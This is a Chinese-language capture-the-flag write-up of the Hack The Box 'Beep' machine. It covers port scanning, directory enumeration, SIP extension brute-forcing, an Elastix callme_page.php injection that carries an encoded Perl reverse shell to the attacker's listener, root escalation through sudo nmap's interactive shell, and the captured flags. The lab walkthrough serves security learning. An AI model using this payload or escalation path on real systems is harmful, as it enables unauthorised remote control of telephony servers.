⚠️ 郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,如果您不同意请关闭该页面!任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
ℹ️ 目标信息
🔍 端口扫描
┌──(liona㉿kali)-[~/Workspace/HTB/Beep] └─$ sudo nmap -sS -p- --max-retries=0 10.10.10.7 -oN allports.txt -oX allports.xml [sudo] password for liona: Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-07 16:27 CST Warning: 10.10.10.7 giving up on port because retransmission cap hit (0). Nmap scan report for 10.10.10.7 (10.10.10.7) Host is up (0.29s latency). Not shown: 57005 closed tcp ports (reset), 8514 filtered tcp ports (no-response) PORT STATE SERVICE 22/tcp open ssh 25/tcp open smtp 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 443/tcp open https 878/tcp open unknown 993/tcp open imaps 995/tcp open pop3s 3306/tcp open mysql 4190/tcp open sieve 4445/tcp open upnotifyp 4559/tcp open hylafax 5038/tcp open unknown 10000/tcp open snet-sensor-mgmt Nmap done: 1 IP address (1 host up) scanned in 90.04 seconds
# Nmap 7.92 scan initiated Thu Apr 7 16:31:47 2022 as: nmap -sV -sC -p 22,25,80,110,111,143,443,878,993,995,3306,4190,4445,4559,5038,10000 -Pn -oN nmap.txt -oX nmap.xml 10.10.10.7 Nmap scan report for 10.10.10.7 (10.10.10.7) Host is up (0.31s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) | ssh-hostkey: | 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA) |_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA) 25/tcp open smtp Postfix smtpd |_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN 80/tcp open http Apache httpd 2.2.3 |_http-server-header: Apache/2.2.3 (CentOS) |_http-title: Did not follow redirect to https://10.10.10.7/ 110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 |_ssl-date: ERROR: Script execution failed (use -d to debug) |_ssl-cert: ERROR: Script execution failed (use -d to debug) |_pop3-capabilities: RESP-CODES TOP STLS USER AUTH-RESP-CODE PIPELINING LOGIN-DELAY(0) IMPLEMENTATION(Cyrus POP3 server v2) EXPIRE(NEVER) APOP UIDL |_tls-alpn: ERROR: Script execution failed (use -d to debug) |_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug) |_sslv2: ERROR: Script execution failed (use -d to debug) 111/tcp open rpcbind 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100024 1 875/udp status |_ 100024 1 878/tcp status 143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 |_ssl-date: ERROR: Script execution failed (use -d to debug) |_tls-alpn: ERROR: Script execution failed (use -d to debug) |_imap-capabilities: LISTEXT MULTIAPPEND Completed LIST-SUBSCRIBED STARTTLS UIDPLUS X-NETSCAPE NAMESPACE NO IMAP4rev1 IMAP4 ACL URLAUTHA0001 SORT=MODSEQ OK CATENATE ANNOTATEMORE MAILBOX-REFERRALS CONDSTORE IDLE THREAD=ORDEREDSUBJECT ATOMIC THREAD=REFERENCES RENAME LITERAL+ BINARY CHILDREN RIGHTS=kxte UNSELECT SORT QUOTA ID |_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug) |_ssl-cert: ERROR: Script execution failed (use -d to debug) |_sslv2: ERROR: Script execution failed (use -d to debug) |_imap-ntlm-info: ERROR: Script execution failed (use -d to debug) 443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS)) |_http-server-header: Apache/2.2.3 (CentOS) | http-robots.txt: 1 disallowed entry |_/ | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=-- | Not valid before: 2017-04-07T08:22:08 |_Not valid after: 2018-04-07T08:22:08 |_ssl-date: 2022-04-07T08:35:18+00:00; -1s from scanner time. |_http-title: Elastix - Login page 878/tcp open status 1 (RPC #100024) 993/tcp open ssl/imap Cyrus imapd |_imap-capabilities: CAPABILITY 995/tcp open pop3 Cyrus pop3d |_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug) |_ssl-date: ERROR: Script execution failed (use -d to debug) |_tls-alpn: ERROR: Script execution failed (use -d to debug) |_ssl-cert: ERROR: Script execution failed (use -d to debug) |_ssl-known-key: ERROR: Script execution failed (use -d to debug) |_sslv2: ERROR: Script execution failed (use -d to debug) 3306/tcp open mysql MySQL (unauthorized) |_sslv2: ERROR: Script execution failed (use -d to debug) |_ssl-cert: ERROR: Script execution failed (use -d to debug) |_ssl-date: ERROR: Script execution failed (use -d to debug) |_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug) |_tls-alpn: ERROR: Script execution failed (use -d to debug) 4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap) 4445/tcp open upnotifyp? 4559/tcp open hylafax HylaFAX 4.3.10 5038/tcp open asterisk Asterisk Call Manager 1.1 10000/tcp open http MiniServ 1.570 (Webmin httpd) |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1). Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix Host script results: |_clock-skew: -1s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Apr 7 16:37:10 2022 -- 1 IP address (1 host up) scanned in 322.36 seconds
🤔 情报分析
二话不说先访问
web看一眼
先试一下万能密码
admin’ — - ,没有生效遍历目录,查看是否存在可疑目录
┌──(liona㉿kali)-[~/Workspace/HTB/Beep] └─$ gobuster dir -u https://10.10.10.7 -w ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt --add-slash -k =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: https://10.10.10.7 [+] Method: GET [+] Threads: 10 [+] Wordlist: ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Add Slash: true [+] Timeout: 10s =============================================================== 2022/04/08 00:00:01 Starting gobuster in directory enumeration mode =============================================================== /images/ (Status: 200) [Size: 29898] /cgi-bin/ (Status: 403) [Size: 286] /help/ (Status: 200) [Size: 346] /icons/ (Status: 200) [Size: 31006] /themes/ (Status: 200) [Size: 3172] /modules/ (Status: 200) [Size: 13132] /mail/ (Status: 200) [Size: 2411] /admin/ (Status: 302) [Size: 0] [--> config.php] /static/ (Status: 200) [Size: 1276] /mailman/ (Status: 403) [Size: 286]
把所有的目录都浏览一遍并没有发现有用的信息
只能搜索一下这个
elastix 的漏洞了
发现存在两个漏洞,先看第一个
rhost="10.10.10.7" lhost="10.10.14.26" lport=4444 extension="233" # Reverse shell payload url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A' print(url)
这里的
extension的值需要爆破,爆破工具使用 svwar 具体的命令为svwar -e1-1000 -m INVITE 10.10.10.7 | grep reqauth
+------------+----------------+ | 212 | weird | +------------+----------------+ | 233 | reqauth | +------------+----------------+ | 214 | weird | +------------+----------------+
然后就确定了
extension 为 233💥 实施攻击
获取 USER.TXT
获取到
extension ID 那么就编写脚本┌──(liona㉿kali)-[~/Workspace/HTB/Beep] └─$ cat exploit.py rhost="10.10.10.7" lhost="10.10.14.26" lport=1234 extension="233" # Reverse shell payload url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A' print(url)
打开监听端口,然后运行脚本
┌──(liona㉿kali)-[~/Workspace/HTB/Beep] └─$ nc -nvlp 1234 Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::1234 Ncat: Listening on 0.0.0.0:1234
┌──(liona㉿kali)-[~/Workspace/HTB/Beep] └─$ python exploit.py https://10.10.10.7/recordings/misc/callme_page.php?action=c&callmenum=233@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%2210.10.14.26%3a1234%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A
获得攻击连接,将连接放入浏览器访问
┌──(liona㉿kali)-[~/Workspace/HTB/Beep] └─$ nc -nvlp 1234 Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::1234 Ncat: Listening on 0.0.0.0:1234 Ncat: Connection from 10.10.10.7. Ncat: Connection from 10.10.10.7:37004. id uid=100(asterisk) gid=101(asterisk) ls ks-script-_a_xql ks-script-_a_xql.log ntpC5OCyW sess_2pmh5e2nu85nnj8c8aih748kc2 sess_31bkn9j9rhmapvuecq7au5tua1 sess_48lp7n2s1ehte6sv17mavv4bh3 sess_4qcq58i5cp9n56he31hgtd2eh7 sess_b666c0g4f6f8kht7tdcpf8tf10 sess_fn9vpu5ob4ke7q4p1p13ekvb15 sess_h6qcpmim0c1jfraoh2om0q5q11 sess_ll4dsh4tksmo9fhr5slb85hlg1 sess_lmb8v0tf49979c44ruhmolqub1 sess_o31o5epfs746itl502229ri0m1 sess_u29ajiinajgjncsbhv1bpcu361 sess_vca0v5tr9ira69sntceh3hu7f0 trunk_dump.sql vmware-config-3543.0 vmware-installer-3348.0 vmware-installer-3412.0 vmware-root python -c "import pty;pty.spawn('/bin/bash')" bash-3.2$ ls /home ls /home fanis spamfilter bash-3.2$ cat /home/fanis/user.txt cat /home/fanis/user.txt f8a3621e369969607544e53b40a6a94f bash-3.2$
获取 ROOT.TXT
bash-3.2$ sudo -l sudo -l Matching Defaults entries for asterisk on this host: env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY" User asterisk may run the following commands on this host: (root) NOPASSWD: /sbin/shutdown (root) NOPASSWD: /usr/bin/nmap (root) NOPASSWD: /usr/bin/yum (root) NOPASSWD: /bin/touch (root) NOPASSWD: /bin/chmod (root) NOPASSWD: /bin/chown (root) NOPASSWD: /sbin/service (root) NOPASSWD: /sbin/init (root) NOPASSWD: /usr/sbin/postmap (root) NOPASSWD: /usr/sbin/postfix (root) NOPASSWD: /usr/sbin/saslpasswd2 (root) NOPASSWD: /usr/sbin/hardware_detector (root) NOPASSWD: /sbin/chkconfig (root) NOPASSWD: /usr/sbin/elastix-helper # NMAP 接入Shell bash-3.2$ sudo /usr/bin/nmap --interactive sudo /usr/bin/nmap --interactive Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ ) Welcome to Interactive Mode -- press h <enter> for help nmap> !sh !sh sh-3.2# ls ls ks-script-_a_xql sess_ll4dsh4tksmo9fhr5slb85hlg1 ks-script-_a_xql.log sess_lmb8v0tf49979c44ruhmolqub1 ntpC5OCyW sess_o31o5epfs746itl502229ri0m1 sess_2pmh5e2nu85nnj8c8aih748kc2 sess_u29ajiinajgjncsbhv1bpcu361 sess_31bkn9j9rhmapvuecq7au5tua1 sess_vca0v5tr9ira69sntceh3hu7f0 sess_48lp7n2s1ehte6sv17mavv4bh3 trunk_dump.sql sess_4qcq58i5cp9n56he31hgtd2eh7 vmware-config-3543.0 sess_b666c0g4f6f8kht7tdcpf8tf10 vmware-installer-3348.0 sess_fn9vpu5ob4ke7q4p1p13ekvb15 vmware-installer-3412.0 sess_h6qcpmim0c1jfraoh2om0q5q11 vmware-root sh-3.2# cat /root/root.txt cat /root/root.txt 19a0cdfc5f303bf456420c60aac4123d sh-3.2#
📝 总结
知识点
nmap的shell交互模式: nmap --interactive(已经废弃)
svwar对 VoIPextension进行扫描